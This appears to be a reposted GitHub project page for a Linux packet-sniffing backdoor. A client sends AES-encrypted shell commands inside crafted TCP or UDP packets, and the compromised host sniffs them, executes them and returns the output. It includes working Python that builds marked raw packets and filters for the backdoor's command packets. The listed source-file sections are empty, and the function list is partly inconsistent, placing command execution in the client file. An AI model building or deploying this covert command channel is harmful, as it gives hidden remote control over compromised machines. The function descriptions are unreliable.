Linux Packet Sniffing Backdoor.

Linux backdoor that gives a client a “remote” terminal on the compromised machine: the client sends commands inside crafted packets, and the compromised host sniffs for those packets, executes the commands, and sends the output back.
Latest change 10/19/2015:
– serverTCP.py & serverUDP.py: added a sleep so the crafted reply packets are sent before the server switches back to listening.

Depends:
– pip install setproctitle

+ SOURCE FILE:
– clientTCP.py : Sends data (commands) to the compromised server and receives back the output from the server.
– clientUDP.py : Sends data (commands) to the compromised server and receives back the output from the server.
– serverTCP.py : Receives the command from the client, executes it and returns the output back to the client.
– serverUDP.py : Receives the command from the client, executes it and returns the output back to the client.

clientTCP.py

with functions:
– encryptData : Encrypts the passed-in data string with AES using the specified encryption key and salt value.
– decryptData : Decrypts the passed-in data string with AES using the specified decryption key and salt value.
– getCommand : Parses the packet object handed over by the scapy sniff of the traffic reaching the host and filters it further (via packetCheck) to make sure it is the packet we are looking for, not ordinary traffic. It then decrypts the command extracted from the payload, executes it, and pipes the output through encryptData before sending it back to the client.
– packetCheck : Checks whether a sniffed packet is one of ours by comparing its header fields against the values we set in our crafted packets. Returns True or False.
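The packetCheck/getCommand pairing above is the part of the design that decides whether the sniffer acts on a packet at all, so it is worth seeing the filter written out. The following is an added example (not code from this repository): it builds a raw IPv4/TCP packet the way a client crafting the channel would, then parses sniffed bytes and applies a packetCheck-style filter on marker fields. The marker values (IP ID 0x1337, source port 8505, destination port 80, PSH|ACK flags) and the function names are assumptions made for the example, not the values the project uses; the example parses raw bytes with the standard library instead of scapy so it runs offline.

```python
import socket
import struct

# Marker values that, by assumption, the client stamps into every crafted packet
# and packet_check looks for. Hypothetical constants, not the project's own.
MARK_IP_ID = 0x1337
MARK_SPORT = 8505
MARK_DPORT = 80          # blends in with ordinary web traffic
TCP_PSH_ACK = 0x18       # flags a data-carrying segment normally has


def ip_checksum(header: bytes) -> int:
    """One's-complement checksum of an IPv4 header (checksum field zeroed).
    Run over a header that still contains its checksum, it returns 0 when valid."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_packet(payload: bytes, src_ip: str, dst_ip: str,
                 ip_id: int = MARK_IP_ID, sport: int = MARK_SPORT,
                 dport: int = MARK_DPORT, flags: int = TCP_PSH_ACK) -> bytes:
    """Craft a raw IPv4+TCP packet carrying `payload` (already-encrypted bytes
    in the real tool). TCP checksum is left at 0; a sender like scapy fills it in."""
    tcp = struct.pack("!HHLLBBHHH", sport, dport, 0, 0, 5 << 4, flags, 8192, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, ip_id, 0x4000, 64,
                     socket.IPPROTO_TCP, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return ip + tcp + payload


def parse_packet(raw: bytes):
    """Return (header fields, payload) for a sniffed IPv4/TCP packet, or None if
    the bytes are not a well-formed IPv4/TCP packet with a valid IP checksum."""
    if len(raw) < 20 or raw[0] >> 4 != 4:
        return None
    ihl = (raw[0] & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl + 20:
        return None
    _, _, total_len, ip_id, _, _, proto, _, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", raw[:20])
    if proto != socket.IPPROTO_TCP or ip_checksum(raw[:ihl]) != 0:
        return None
    sport, dport, _, _, off, flags, _, _, _ = struct.unpack(
        "!HHLLBBHHH", raw[ihl:ihl + 20])
    doff = (off >> 4) * 4
    if doff < 20 or len(raw) < ihl + doff:
        return None
    end = min(total_len, len(raw))
    fields = {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst),
              "ip_id": ip_id, "sport": sport, "dport": dport, "flags": flags}
    return fields, raw[ihl + doff:end]


def packet_check(raw: bytes) -> bool:
    """Mirror of a packetCheck-style filter: True only when every marker the
    client sets is present and the segment actually carries data."""
    parsed = parse_packet(raw)
    if parsed is None:
        return False
    f, payload = parsed
    return (f["ip_id"] == MARK_IP_ID and f["sport"] == MARK_SPORT
            and f["dport"] == MARK_DPORT and f["flags"] == TCP_PSH_ACK
            and len(payload) > 0)


def get_payload(raw: bytes):
    """What getCommand would hand to decryptData: the payload of a matching
    packet, or None when the packet is not ours."""
    return parse_packet(raw)[1] if packet_check(raw) else None


if __name__ == "__main__":
    # Constructed sample: the payload stands in for AES ciphertext of a command.
    pkt = build_packet(b"encrypted-command-bytes", "10.0.0.2", "10.0.0.1")
    print(packet_check(pkt), get_payload(pkt))
    print(packet_check(build_packet(b"x", "10.0.0.2", "10.0.0.1", sport=4444)))
```

Every filter condition is a field an observer can also match on: the same constant IP ID, source port and flag combination that lets the server pick its packets out of the noise is exactly the signature a network IDS rule can key on, which is why the check is kept strict (checksum, protocol and marker fields all have to line up) rather than loose.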

clientTCP.py :

clientUDP.py :

serverTCP.py :

serverUDP.py :

Source : https://github.com/JustinTom